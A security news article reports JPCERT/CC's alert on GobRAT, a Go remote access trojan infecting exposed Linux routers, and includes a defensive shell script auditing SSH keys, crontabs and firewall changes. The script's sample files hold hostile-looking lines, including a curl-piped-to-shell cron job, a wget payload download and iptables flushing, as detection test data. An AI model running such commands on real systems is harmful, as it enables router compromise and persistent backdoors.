JPCERT/CC is warning of cyberattacks against Linux routers in Japan that have been infected with a new Golang remote access trojan (RAT) called GobRAT.
Threat actors are targeting Linux routers whose web UI (WEBUI) is exposed to the internet, running malicious scripts on the device to deploy the GobRAT malware.
“Initially, the attacker targets a router whose WEBUI is open to the public, executes scripts possibly by using vulnerabilities, and finally infects the GobRAT.” reads the alert published by the JPCERT Coordination Center (JPCERT/CC).
The Loader Script, as its name suggests, handles downloading and deploying GobRAT. The experts noticed an SSH public key hard-coded in the script, likely intended as a backdoor. The Loader Script also establishes persistence via crontab, because GobRAT itself does not implement a persistence mechanism.
The Loader Script performs several tasks: disabling the firewall, downloading the GobRAT build that matches the target machine’s architecture, creating the Start Script and making it persistent, creating and running the Daemon Script, and registering an SSH public key in /root/.ssh/authorized_keys.
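As an added illustration (not code from JPCERT/CC, and nothing taken from the GobRAT samples), the following POSIX shell audit looks for three of the loader artifacts listed above on a recovered router filesystem: an SSH public key in authorized_keys that is not on an operator allowlist, crontab entries with common persistence patterns, and firewall-disabling commands inside a recovered script. The allowlist, file paths, and all sample file contents are constructed for the example; the real indicators of compromise are in the JPCERT/CC alert.

```shell
#!/bin/sh
# Added example, not JPCERT/CC's code nor anything from the GobRAT samples.
# Audits three loader-script artifacts described in the alert:
#   1. SSH public keys in authorized_keys that are not on an allowlist
#   2. crontab entries that look like loader persistence
#   3. firewall-disabling commands inside a recovered script
# Every input below is a constructed sample file; real IoCs are in the alert.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# --- constructed sample inputs (stand-ins for files pulled off a router) ---
ALLOW="$WORK/allowlist"            # keys the operator deployed: "<type> <blob>"
AUTH_KEYS="$WORK/authorized_keys"  # stand-in for /root/.ssh/authorized_keys
CRONTAB="$WORK/crontab"            # stand-in for /etc/crontab
LOADER="$WORK/loader.sh"           # stand-in for a recovered loader script

cat >"$ALLOW" <<'EOF'
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKnownAdminKeyExample
EOF

cat >"$AUTH_KEYS" <<'EOF'
# management key, deployed on purpose
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKnownAdminKeyExample admin@mgmt
command="/bin/sh",no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDConstructedUnknownBlob root@unknown
EOF

cat >"$CRONTAB" <<'EOF'
# m h dom mon dow user command
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
@reboot root /var/tmp/.x/start.sh
*/5 * * * * root curl -s http://example.invalid/a | sh
EOF

cat >"$LOADER" <<'EOF'
#!/bin/sh
iptables -F
iptables -P INPUT ACCEPT
wget -q -O /var/tmp/.x/bot http://example.invalid/bot.mips
EOF

# 1. Print authorized_keys lines whose "<type> <blob>" pair is not in the
#    allowlist. Leading key options (command="...", from="...") are skipped by
#    locating the key-type token instead of assuming it is the first field.
find_unknown_keys() {   # $1 allowlist file, $2 authorized_keys file
    awk '
        FILENAME == ARGV[1] { if (NF >= 2) allow[$1 " " $2] = 1; next }
        /^[ \t]*(#|$)/ { next }
        {
            for (i = 1; i < NF; i++) {
                if ($i ~ /^(ssh-(rsa|dss|ed25519)|ecdsa-sha2-nistp[0-9]+)$/) {
                    if (!(($i " " $(i + 1)) in allow)) print "UNKNOWN KEY: " $0
                    break
                }
            }
        }' "$1" "$2"
}

# 2. Print crontab entries matching common loader persistence patterns:
#    @reboot jobs, commands living in world-writable directories, or a
#    download piped straight into a shell.
find_suspicious_cron() {   # $1 crontab file
    grep -v -e '^[[:space:]]*#' -e '^[[:space:]]*$' "$1" \
      | grep -E '@reboot|/(tmp|var/tmp|dev/shm)/|(wget|curl)[^|]*[|][[:space:]]*(sh|bash|ash)' \
      | sed 's/^/SUSPICIOUS CRON: /'
}

# 3. Print lines of a recovered script that flush or disable the host firewall.
find_firewall_disable() {   # $1 script file
    grep -E -e 'iptables[[:space:]]+-F' \
            -e 'iptables[[:space:]]+-P[[:space:]]+(INPUT|FORWARD|OUTPUT)[[:space:]]+ACCEPT' \
            -e 'ufw[[:space:]]+disable' \
            -e '(service|systemctl)[[:space:]]+(stop|disable)[[:space:]]+(firewalld|iptables|nftables)' \
            -e 'nft[[:space:]]+flush[[:space:]]+ruleset' "$1" \
      | sed 's/^/FIREWALL DISABLE: /'
}

# Run the three checks against the constructed inputs.
find_unknown_keys "$ALLOW" "$AUTH_KEYS"
find_suspicious_cron "$CRONTAB"
find_firewall_disable "$LOADER"
```

On a real device, point the functions at the router's own authorized_keys, the system and per-user crontabs, and any script recovered from the paths the loader wrote to; the patterns are deliberately generic, so a hit is a lead to triage against the alert's indicators, not a verdict on its own.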
The RAT communicates with its C2 server over TLS and can execute various commands. JPCERT/CC reported that the samples are packed with UPX 4.x. The researchers observed samples for multiple architectures, including ARM, MIPS, x86, and x86-64.
Upon starting up, GobRAT checks its own IP address and MAC address, the system uptime via the uptime command, and the network communication status via /proc/net/dev.
The malware supports 22 commands; the researchers have identified the following commands:
“In recent years, different types of malware using Go language have been confirmed, and the GobRAT malware confirmed this time uses gob, which can only be handled by Go language, for communication.” concludes the alert that also provides indicators of compromise. “Please continuously beware of malware that infects routers, not limited to GobRAT, since they are difficult to detect.”